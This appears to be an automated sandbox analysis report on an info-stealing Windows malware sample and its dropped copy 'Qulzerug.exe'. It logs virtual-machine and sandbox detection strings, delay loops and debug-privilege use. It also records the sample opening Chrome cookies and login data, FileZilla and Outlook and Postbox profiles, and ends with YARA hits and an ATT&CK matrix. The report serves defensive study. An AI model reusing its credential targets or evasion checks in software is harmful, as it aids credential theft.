                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98235Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98106Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97889Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97782Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97657Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97532Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97407Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97297Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97188Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97063Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96938Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96813Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96688Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96578Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96344Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96234Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96125Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96016Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95906Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95780Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 95094Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 94969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 94860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 94736Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 94592Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 94485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 94375Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99874Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99219Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99094Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98235Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97954Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97806Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97685Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97557Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97188Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 97078Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 96957Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: 6Ek4nfs2y1.exe, 00000008.00000002.2501007282.000000000138F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                  Source: Qulzerug.exe, 0000000D.00000002.2504913703.0000000001255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemuV
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1287219825.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1501370521.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1510861203.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, Qulzerug.exe, 0000000D.00000002.2500946506.000000000122D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Qulzerug.exe, 0000000C.00000002.2500217975.0000000001675000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeCode function: 8_2_0158DD60 LdrInitializeThunk,8_2_0158DD60
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeProcess created: C:\Users\user\Desktop\6Ek4nfs2y1.exe "C:\Users\user\Desktop\6Ek4nfs2y1.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess created: C:\Users\user\AppData\Roaming\Qulzerug.exe "C:\Users\user\AppData\Roaming\Qulzerug.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Users\user\Desktop\6Ek4nfs2y1.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Users\user\Desktop\6Ek4nfs2y1.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Users\user\AppData\Roaming\Qulzerug.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.3af9550.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.75a0000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6660040.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.3af9550.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.75a0000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.687f060.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.687f060.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6660040.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4a24a70.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65aced8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.49fca50.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6bfbf00.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65d4ef8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6c23f20.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Qulzerug.exe.65670b8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6bb60e0.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7912, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 7536, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1384, type: MEMORYSTR
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.3af9550.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.75a0000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6660040.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.3af9550.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.75a0000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.687f060.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.687f060.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.Qulzerug.exe.4714720.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.6Ek4nfs2y1.exe.6660040.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1526328229.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation
                  1
                  Scheduled Task/Job
                  11
                  Process Injection
                  1
                  Masquerading
                  2
                  OS Credential Dumping
                  211
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  1
                  Disable or Modify Tools
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading
                  1
                  Registry Run Keys / Startup Folder
                  41
                  Virtualization/Sandbox Evasion
                  Security Account Manager41
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares2
                  Data from Local System
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading
                  11
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture3
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Obfuscated Files or Information
                  LSA Secrets1
                  System Network Configuration Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing
                  Cached Domain Credentials14
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
